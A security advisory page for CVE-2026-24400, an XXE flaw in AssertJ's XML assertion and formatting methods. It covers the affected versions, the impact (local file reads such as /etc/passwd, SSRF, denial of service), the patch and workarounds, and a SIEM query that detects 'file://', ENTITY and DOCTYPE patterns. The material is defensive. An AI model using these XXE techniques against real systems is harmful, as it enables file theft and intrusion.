CVE-2026-24400 – This XXE vulnerability in AssertJ allows attack... (How to Fix)

Q: What is the severity of CVE-2026-24400?

CVE-2026-24400 has a CVSS score of 9.1 (CRITICAL). This XXE vulnerability in AssertJ allows attackers to read local files, perform SSRF attacks, or cause denial of service when untrusted XML is processed by affected methods. Applications using AssertJ versions 1.4.0 through 3.27.6 with the isXmlEqualTo assertion or XmlStringPrettyFormatter are vulnerable. The risk exists only when processing untrusted XML input.

📋 TL;DR

This XXE vulnerability in AssertJ allows attackers to read local files, perform SSRF attacks, or cause denial of service when untrusted XML is processed by affected methods. Applications using AssertJ versions 1.4.0 through 3.27.6 with the isXmlEqualTo assertion or XmlStringPrettyFormatter are vulnerable. The risk exists only when processing untrusted XML input.

💻 Affected Systems

Products:

AssertJ

Versions: 1.4.0 through 3.27.6

Operating Systems: All platforms running Java/JVM

Default Config Vulnerable: ⚠️ Yes

Notes: Only vulnerable when using isXmlEqualTo(CharSequence) or XmlStringPrettyFormatter.xmlPrettyFormat(String) with untrusted XML input.

📦 What is this software?

Assertj by Assertj

View all CVEs affecting Assertj →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise via sensitive file disclosure (e.g., /etc/passwd, configuration files), SSRF attacks against internal services, and application denial of service.

🟠

Likely Case

Local file disclosure of application configuration or system files, potentially leading to credential theft or further exploitation.

🟢

If Mitigated

No impact if proper input validation prevents untrusted XML from reaching vulnerable methods.

🌐 Internet-Facing: HIGH if application accepts XML input from external sources and uses affected methods.

🏢 Internal Only: MEDIUM if XML processing occurs internally with potentially malicious content.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XXE exploitation is well-documented and requires minimal attacker skill. No public exploit code needed for basic attacks.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.27.7

Vendor Advisory: https://github.com/assertj/assertj/security/advisories/GHSA-rqfh-9r24-8c9r

Restart Required: Yes

Instructions:

1. Update AssertJ dependency to version 3.27.7 or later. 2. Replace deprecated isXmlEqualTo with XMLUnit assertions. 3. Restart application.

🔧 Temporary Workarounds

Disable vulnerable methods

all

Avoid using isXmlEqualTo(CharSequence) or XmlStringPrettyFormatter with any untrusted input

Input validation

all

Implement strict XML input validation to prevent XXE payloads from reaching vulnerable methods

🧯 If You Can't Patch

Replace all uses of isXmlEqualTo(CharSequence) with XMLUnit assertions
Implement XML input sanitization to strip DTDs and external entity references

🔍 How to Verify

Check if Vulnerable:

Check project dependencies for AssertJ versions 1.4.0 through 3.27.6 and search code for usage of isXmlEqualTo(CharSequence) or XmlStringPrettyFormatter.xmlPrettyFormat(String)

Check Version:

mvn dependency:tree | grep assertj-core (Maven) or gradle dependencies | grep assertj (Gradle)

Verify Fix Applied:

Verify AssertJ version is 3.27.7+ and deprecated methods have been replaced with XMLUnit

📡 Detection & Monitoring

Log Indicators:

Unusual file access patterns, unexpected HTTP/HTTPS requests from application, XML parsing errors with entity references

Network Indicators:

Outbound requests to internal services from application server, unusual file:// protocol usage

SIEM Query:

source="application.logs" AND ("file://" OR "ENTITY" OR "DOCTYPE") AND "XmlStringPrettyFormatter"

📊 Metadata

CVE ID: CVE-2026-24400

CVSS v3 Score: 9.1 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CWE: CWE-611

Published: January 26, 2026

Last Updated: March 9, 2026

🔗 References

https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html Technical Description
https://github.com/assertj/assertj/commit/85ca7eb6609bb179c043b85ae7d290523b1ba79a Patch
https://github.com/assertj/assertj/releases/tag/assertj-build-3.27.7 Product,Release Notes
https://github.com/assertj/assertj/security/advisories/GHSA-rqfh-9r24-8c9r Mitigation,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-24400, you might also want to check these: